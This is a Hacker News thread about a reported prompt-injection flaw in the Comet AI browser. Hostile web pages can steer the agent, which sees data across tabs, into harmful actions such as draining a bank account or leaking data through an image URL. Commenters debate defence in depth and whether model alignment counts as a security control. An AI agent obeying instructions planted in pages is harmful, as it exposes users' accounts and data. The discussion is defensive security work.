←back to thread

Comet AI browser can get prompt injected from any site, drain your bank account

(twitter.com)
645 points helloplanets | 5 comments | 24 Aug 25 15:14 UTC | HN request time: 0.782s | source
Show context
ec109685 ◴[24 Aug 25 16:14 UTC] No.45005397[source]
It’s obviously fundamentally unsafe when Google, OpenAI and Anthropic haven’t released the same feature and instead use a locked down VM with no cookies to browse the web.

LLM within a browser that can view data across tabs is the ultimate “lethal trifecta”.

Earlier discussion: https://news.ycombinator.com/item?id=44847933

It’s interesting that in Brave’s post describing this exploit, they didn’t reach the fundamental conclusion this is a bad idea: https://brave.com/blog/comet-prompt-injection/

Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough. The only good mitigation they mention is that the agent should drop privileges, but it’s just as easy to hit an attacker controlled image url to leak data as it is to send an email.

replies(7): >>45005444 #>>45005853 #>>45006130 #>>45006210 #>>45006263 #>>45006384 #>>45006571 #
skaul ◴[24 Aug 25 17:43 UTC] No.45006130[source]
(I lead privacy at Brave and am one of the authors)

> Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough.

No, we never claimed or believe that those will be enough. Those are just easy things that browser vendors should be doing, and would have prevented this simple attack. These are necessary, not sufficient.

replies(4): >>45006255 #>>45006329 #>>45006467 #>>45006601 #
cowboylowrez ◴[24 Aug 25 17:57 UTC] No.45006255[source]
what you're saying is that the described step, "model alignment" is necessary even though it will fail a percentage of the time. whenever I see something that is "necessary" but doesn't have like a dozen 9's for reliability against failure or something well lets make that not necessary then. whadya say?
replies(1): >>45006309 #
skaul ◴[24 Aug 25 18:05 UTC] No.45006309[source]
That's not how defense-in-depth works. If a security mitigation catches 90% of the "easy" attacks, that's worth doing, especially when trying to give users an extremely powerful capability. It just shouldn't be the only security measure you're taking.
replies(2): >>45006450 #>>45006710 #
1. MattPalmer1086 ◴[24 Aug 25 18:58 UTC] No.45006710[source]
Defence in depth means you have more than one security control. But the LLM cannot be regarded as a security control in the first place; it's the thing you are trying to defend against.

If you tried to cast an unreliable insider as part of your defence in depth strategy (because they aren't totally unreliable), you would be laughed out of the room in any security group I've ever worked with.

replies(2): >>45006834 #>>45011038 #
2. cowboylowrez ◴[24 Aug 25 19:14 UTC] No.45006834[source]
call it "vibe security" lol
replies(1): >>45006928 #
3. MattPalmer1086 ◴[24 Aug 25 19:25 UTC] No.45006928[source]
Haha, like it!
4. kbrkbr ◴[25 Aug 25 06:53 UTC] No.45011038[source]
I am sure that's what you mean, but I think it is important to state it explicitly every now and then:

> Defence in depth means you have more than one security control

that overlap. Having them strictly parallel is not defense in depth (e.g. on one door to the same room a dog, and on a different unconnected door a guard).

replies(1): >>45011181 #
5. MattPalmer1086 ◴[25 Aug 25 07:16 UTC] No.45011181[source]
Yes, fully agree. Should have made that explicit. And also different types of control too.

So you might have a lock on the door, a dog, and a pressure sensor on the floor after it...